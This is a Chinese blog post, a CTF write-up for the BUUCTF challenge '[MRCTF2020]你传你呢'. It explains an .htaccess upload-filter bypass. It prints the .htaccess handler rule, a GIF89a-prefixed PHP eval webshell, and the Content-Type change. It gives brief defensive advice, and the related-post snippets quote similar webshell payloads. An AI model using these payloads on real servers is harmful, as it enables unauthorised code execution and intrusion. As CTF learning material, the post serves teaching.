【学习笔记 40】 buu [MRCTF2020]你传你呢

最新推荐文章于 2023-10-12 20:14:13 发布
最新推荐文章于 2023-10-12 20:14:13 发布
阅读量409 收藏 2
点赞数 1
分类专栏: ctf 学习笔记 文件上传 文章标签: php web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43553654/article/details/107742850
版权
学习笔记 同时被 3 个专栏收录
50 篇文章 1 订阅
订阅专栏
ctf
47 篇文章 1 订阅
订阅专栏
文件上传
3 篇文章 0 订阅
订阅专栏

0x00 知识点

  1. .htaccess文件上传绕过

0x01 知识点详解

  1. 什么是.htaccess文件?
    答:htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
  2. 怎么利用.htaccess文件进行上传?
    答:我们可以在.htaccess文件文件中加入php解析规则,比如,本题中就利用这个解析规则将jpg文件解析成php文件来执行。

0x02 解题思路

  1. 打开网站一看,不出意外应该是考察文件上传的题目在这里插入图片描述
  2. 上传php文件,phtml文件,上传jpg文件之后改后缀都不行,但是发现只要上传的文件是jpg文件或者png文件都可以上传,并且还会回显上传路径。
  3. 直接上传jpg结尾的一句话木马并不会解析,那我们是不是可以在上传一个.htaccess文件让我们自己来定义php的解析规则,开始尝试
    首先上传一个.htaccess文件
<FilesMatch "yjh.jpg">
 SetHandler application/x-httpd-php
</FilesMatch>

上传抓包
!请添加图片描述请添加图片描述这里注意.htaccess无法直接上传,需要改Content-Type: image/jpeg才可以
之后上传呢yjh.jpg文件

GIF89a
<?php @eval($_POST['lla']);?>

这个直接上传就行了,不用抓包了。在这里插入图片描述记住这个路径,直接利用菜刀或者蚁剑这种webshell工具连接就好了
这个就是我的连接路径

http://2bef5319-b7e2-44c5-8f19-5b718e5475ec.node3.buuoj.cn/upload/bc4440a0c8762723bc7dac811e3137fb/yjh.jpg

在这里插入图片描述
之后再根目录里找到flag

0x03 防护措施

  1. 最简单的方法就是给upload文件夹设置不可执行的权限就可以了。
Noslpum
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF之[MRCTF2020]你你呢-------文件解析漏洞
weixin_44632787的博客
06-19 9052
BUUCTF之[MRCTF2020]你你????呢 虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。 首先,启动挑战的项目 emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上漏洞,结果没做出来。 不管怎么样,先上一句话木马。并且将下面的内容保存成文件1.png GIF89a? <script language="php">eval($_POST['zyh']);</s
BUUCTF之[MRCTF2020]你你呢 1】
qq_40646572的博客
10-25 5288
首先,正常上图片文件,竟然因为文件大小的问题,上失败,就挺难受。不过还好,总算知道是什么原因不能上。总体来讲,这道题,难度是可以的,需要一步步的进行尝试。
[MRCTF2020]你你呢
m0_62905261的博客
09-07 446
[MRCTF2020]你你🐎呢
当使用dbeaver导出多个sql文件,怎么快速的把它合并成一个文件,可以针对多种不同的类型
热门推荐
熊浪的博客
09-19 1万+
1、不知道大家发现没有,当你复制一个同名的文件进入一个存在此名的文件夹下面的时候,计算机会提醒你三种选择,合并,覆盖,保留。   2、而不管是windows还是linux都是支持复制功能命令的,一个是Copy ,一个是cp 且都支持同时复制多个文件,而且后面会加上一个新文件的名称。   3、所以就像我导出来的121个sql文件就可以使用Copy *.sql 初始化数据.sql,这样所有的数据就
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
采区含断层工作面冲击失稳预测
04-19
本文以矿井西二采区某一工作面为工程背景,根据数值模拟峰前扰动时断层面应力、位移分叉趋势对断层冲击地压危险区域进行了初步划分,通过现场电磁辐射监测结果分析可知:预测的预警距离是工作面距断层35m时应当采取加强...
2020网鼎杯青龙组Boom
05-12
【标题】"2020网鼎杯青龙组Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙组"可能是比赛中的一个分组或者阶段,可能...
POSN:POSN-BUU的源代码
04-01
POSN(Positioning System)是一种用于...要深入理解POSN-BUU的具体实现,你需要阅读源代码、了解其设计思路和算法,并结合实际的硬件环境和数据输入进行分析。通过这种方式,你可以逐步掌握这个定位系统的运作机制。
2020年网鼎杯青龙组赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
BUUCTF之[MRCTF2020]你你呢1
weixin_66294723的博客
10-12 735
很明显是文件上漏洞,通过🐎可知应该是要一个马进去,一开始把自己制作的图片马进去后自己的图片马不行,content-type也没问题后上网找wp发现如果一系列%00,改大小写,图片马之类都不行的话 ,或者上之后 但是菜刀连接不了,回显显示没有数据的话,就代表要改配置文件。
buuctf [MRCTF2020]你你呢 解题过程
weixin_43031887的博客
08-29 183
AddType application/x-httpd-php .php .phtml .php3 .png #把png文件当作php文件解析。启动靶机之后通过给的连接打开之后是上图的界面,发现应该是可以通过上文件拿到控制权。AddHandler php5-script php #当文件名中出现php关键字时,文件中的内容会被当中代码执行。然后设置参数1=phpinfo()查看php信息发现正常的一句话木马函数都被disable了。发现报错,说明无法通过简单的一句话木马拿权。再次上即可拿到权限。...
BUUCTF_web[MRCTF2020]你你呢—超详细wp解析
weixin_52653109的博客
05-06 1118
开始直接木马,但不管是“图片马”还是其他格式的马,都不上,一直返回 开始还以为是防火过滤太强了,一直试着绕过。看了下别人的wp原来考察了个htaccess(分布式配置文件) 看了百科和一些大佬的博客介绍的很抽象不好理解,推荐这个网站通俗易懂些 7个常用的.htaccess代码 下面是解题步骤: 一、创建个".htaccess"文件 写入 AddType application/x-httpd-php .png 意思是:上的".png"会被当做 php代码执行。 先创个文档写入,再另存为选择所有
BUUCTF [MRCTF2020]你你呢
墨子辰的博客
02-04 663
考点:.htaccess文件上 先上一个正常图片,发现成功上而且能够访问。 直接一个1.sdga丢上去,看看返回包。 发现可以成功上。 可能有人到这里就懵了,为什么要上1.sdga,它是个神马文件类型???? 对,这里我上了一个不存在的文件类型,这样可以方便我们一下判断出是白名单还是黑名单限制。 这里既然能够上一个不存在的文件名,那么说明这里是黑名单限制,so接下来就是黑名单上的招式咯。 看好了 别眨眼·~~~ No.1:上 .htaccess No.2:上 .user.ini
Web-buu-你你呢 题后总结
WRplayeR的博客
10-14 63
buu做题的总结 包括一些新手错误(我就是新手)
buuctf web
gudugeji的博客
04-24 335
1.warmup 查看源码 2.随便注 堆叠注入 爆数据库 爆表,有两个表 构造playload:http://6d5326a4-99c2-423f-ab6f-46b44dc1853d.node3.buuoj.cn/?inject=1nject=1%27;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435...
upload-labs 04(上.htaccess)
LuckySec
11-05 2174
题目 首先查看源码 该代码对常见的多种类型文件后缀名进行了限制上, 但是仔细可以发现,并没有对htaccess文件进行限制。 于是,我们可以先上一个htaccess文件,再上一个图片马,进行绕过检测上。 htaccess小知识 .htaccess文件(或者&amp;amp;quot;分布式配置文件&amp;amp;quot;),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中...
BUUCTF——[MRCTF2020]你你呢 1
weixin_45864041的博客
09-28 1261
php文件格式的一句话木马。 上失败。那就先jpg文件 发现上成功。然后我们可以先把路径保存下来。 接下来我们再试一下可不可以通过抓包修改的方式上php文件。 发现上失败。然后,我们又得变换思路了。上一篇文章,我们知道目录下有一个index.php文件,然后我们通过上.user.ini文件让图片被当做php文件解析。接下来我想到一个思路,那就是.htaccess文件。.htaccess文件可以用来留后门和针对黑名单绕过,可以在.htaccess 加入php解析规则,就能够使上的jpg/.
buu cipher
最新发布
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值